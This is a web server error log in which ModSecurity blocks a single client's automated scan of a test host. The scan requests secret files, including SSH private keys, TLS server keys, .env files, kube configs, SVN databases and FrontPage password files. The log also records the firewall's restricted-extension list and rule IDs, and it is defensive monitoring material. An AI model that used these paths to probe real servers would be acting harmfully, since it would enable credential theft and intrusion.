[Sat Nov 23 02:24:19.068558 2024] [:error] [pid 3497108] [client 213.152.176.252:12177] [client 213.152.176.252] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z0Euw75BMr22K7-Pm50AqAAAAAk"]
[Sat Nov 23 02:24:19.068727 2024] [:error] [pid 3497108] [client 213.152.176.252:12177] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z0Euw75BMr22K7-Pm50AqAAAAAk"]
[Sat Nov 23 02:24:19.068889 2024] [:error] [pid 3497108] [client 213.152.176.252:12177] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z0Euw75BMr22K7-Pm50AqAAAAAk"]
[Sat Nov 23 02:24:19.070282 2024] [:error] [pid 3497103] [client 213.152.176.252:15391] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z0EuwxmTN5KhPvs24PP_MQAAAAI"]
[Sat Nov 23 02:24:19.070535 2024] [:error] [pid 3497103] [client 213.152.176.252:15391] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z0EuwxmTN5KhPvs24PP_MQAAAAI"]
[Sat Nov 23 02:24:19.070709 2024] [:error] [pid 3497103] [client 213.152.176.252:15391] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z0EuwxmTN5KhPvs24PP_MQAAAAI"]
[Sat Nov 23 02:24:19.075797 2024] [:error] [pid 3497107] [client 213.152.176.252:51475] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z0Euw2EdcFKcrd_qegGIXwAAAAg"]
[Sat Nov 23 02:24:19.076138 2024] [:error] [pid 3497107] [client 213.152.176.252:51475] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z0Euw2EdcFKcrd_qegGIXwAAAAg"]
[Sat Nov 23 02:24:19.076315 2024] [:error] [pid 3497107] [client 213.152.176.252:51475] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z0Euw2EdcFKcrd_qegGIXwAAAAg"]
[Sat Nov 23 02:24:19.138970 2024] [:error] [pid 3497104] [client 213.152.176.252:29807] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z0Euw12SxW3h1NpXhmVl-QAAAAQ"]
[Sat Nov 23 02:24:19.139318 2024] [:error] [pid 3497104] [client 213.152.176.252:29807] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z0Euw12SxW3h1NpXhmVl-QAAAAQ"]
[Sat Nov 23 02:24:19.139508 2024] [:error] [pid 3497104] [client 213.152.176.252:29807] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z0Euw12SxW3h1NpXhmVl-QAAAAQ"]
[Sat Nov 23 02:24:19.157002 2024] [:error] [pid 3497103] [client 213.152.176.252:34719] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z0EuwxmTN5KhPvs24PP_MgAAAAI"]
[Sat Nov 23 02:24:19.157147 2024] [:error] [pid 3497103] [client 213.152.176.252:34719] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z0EuwxmTN5KhPvs24PP_MgAAAAI"]
[Sat Nov 23 02:24:19.157323 2024] [:error] [pid 3497103] [client 213.152.176.252:34719] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z0EuwxmTN5KhPvs24PP_MgAAAAI"]
[Sat Nov 23 02:24:19.157497 2024] [:error] [pid 3497103] [client 213.152.176.252:34719] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z0EuwxmTN5KhPvs24PP_MgAAAAI"]
[Sat Nov 23 02:24:19.160027 2024] [:error] [pid 3497107] [client 213.152.176.252:32159] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z0Euw2EdcFKcrd_qegGIYAAAAAg"]
[Sat Nov 23 02:24:19.160240 2024] [:error] [pid 3497107] [client 213.152.176.252:32159] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z0Euw2EdcFKcrd_qegGIYAAAAAg"]
[Sat Nov 23 02:24:19.160491 2024] [:error] [pid 3497107] [client 213.152.176.252:32159] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z0Euw2EdcFKcrd_qegGIYAAAAAg"]
[Sat Nov 23 02:24:19.160638 2024] [:error] [pid 3497107] [client 213.152.176.252:32159] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z0Euw2EdcFKcrd_qegGIYAAAAAg"]
[Sat Nov 23 02:24:19.200116 2024] [:error] [pid 3497075] [client 213.152.176.252:12891] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z0Euw0rMYFJYUcioPOKcRAAAAAY"]
[Sat Nov 23 02:24:19.200239 2024] [authz_core:error] [pid 3497073] [client 213.152.176.252:15671] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sat Nov 23 02:24:19.200315 2024] [:error] [pid 3497075] [client 213.152.176.252:12891] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z0Euw0rMYFJYUcioPOKcRAAAAAY"]
[Sat Nov 23 02:24:19.200472 2024] [:error] [pid 3497075] [client 213.152.176.252:12891] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z0Euw0rMYFJYUcioPOKcRAAAAAY"]
[Sat Nov 23 02:24:19.224828 2024] [:error] [pid 3497106] [client 213.152.176.252:15181] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z0Euw7scfpmcksFgC5A3vwAAAAU"]
[Sat Nov 23 02:24:19.225037 2024] [:error] [pid 3497106] [client 213.152.176.252:15181] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z0Euw7scfpmcksFgC5A3vwAAAAU"]
[Sat Nov 23 02:24:19.225201 2024] [:error] [pid 3497106] [client 213.152.176.252:15181] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z0Euw7scfpmcksFgC5A3vwAAAAU"]
[Sat Nov 23 02:24:19.230702 2024] [:error] [pid 3497103] [client 213.152.176.252:57451] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0EuwxmTN5KhPvs24PP_MwAAAAI"]
[Sat Nov 23 02:24:19.230921 2024] [:error] [pid 3497103] [client 213.152.176.252:57451] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0EuwxmTN5KhPvs24PP_MwAAAAI"]
[Sat Nov 23 02:24:19.231112 2024] [:error] [pid 3497103] [client 213.152.176.252:57451] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0EuwxmTN5KhPvs24PP_MwAAAAI"]
[Sat Nov 23 02:24:19.232528 2024] [authz_core:error] [pid 3497107] [client 213.152.176.252:12095] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Sat Nov 23 02:24:19.246210 2024] [authz_core:error] [pid 3497108] [client 213.152.176.252:51575] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Sat Nov 23 02:24:19.252470 2024] [:error] [pid 3497074] [client 213.152.176.252:62187] [client 213.152.176.252] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z0Euw2_5RwEvYj7kdpUb4wAAAAc"]
[Sat Nov 23 02:24:19.252686 2024] [:error] [pid 3497074] [client 213.152.176.252:62187] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z0Euw2_5RwEvYj7kdpUb4wAAAAc"]
[Sat Nov 23 02:24:19.252845 2024] [:error] [pid 3497074] [client 213.152.176.252:62187] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z0Euw2_5RwEvYj7kdpUb4wAAAAc"]
[Sat Nov 23 02:24:19.273162 2024] [authz_core:error] [pid 3497075] [client 213.152.176.252:13587] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sat Nov 23 02:24:19.277905 2024] [:error] [pid 3497073] [client 213.152.176.252:26013] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z0EuwyUssr-WQT-emNMsYwAAAAE"]
[Sat Nov 23 02:24:19.279332 2024] [:error] [pid 3497073] [client 213.152.176.252:26013] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z0EuwyUssr-WQT-emNMsYwAAAAE"]
[Sat Nov 23 02:24:19.279779 2024] [:error] [pid 3497073] [client 213.152.176.252:26013] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z0EuwyUssr-WQT-emNMsYwAAAAE"]
